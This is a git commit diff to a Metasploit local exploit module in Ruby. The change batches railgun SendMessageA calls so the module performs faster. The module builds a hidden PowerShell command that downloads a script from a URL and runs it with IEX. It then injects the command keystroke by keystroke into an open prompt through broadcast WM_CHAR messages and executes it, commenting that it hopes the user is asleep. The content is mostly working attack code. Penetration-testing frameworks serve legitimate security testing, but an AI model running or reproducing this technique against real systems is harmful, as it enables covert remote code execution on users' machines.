Use multi railgun call for a large performance increase.

bug/bundler_fix
Meatballs 2013-10-05 12:58:46 +01:00
parent 9b96351ba2
commit 536c3c7b92
1 changed files with 8 additions and 3 deletions

View File

@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore['CUSTOM_COMMAND']
command = datastore['CUSTOM_COMMAND']
else
print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
command = cmd_psh_payload(payload.encoded)
end
make_it(command)
@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Local
def primer
url = get_uri()
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
command = "powershell.exe -w hidden -nop -c #{download_and_run}"
make_it(command)
end
@ -212,10 +212,15 @@ class Metasploit3 < Msf::Exploit::Local
end
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
multi_rail = []
command.each_char do |c|
print c if command.length < 200
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0]]
#client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
end
client.railgun.multi(multi_rail)
print_line
print_status("Executing command...")
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)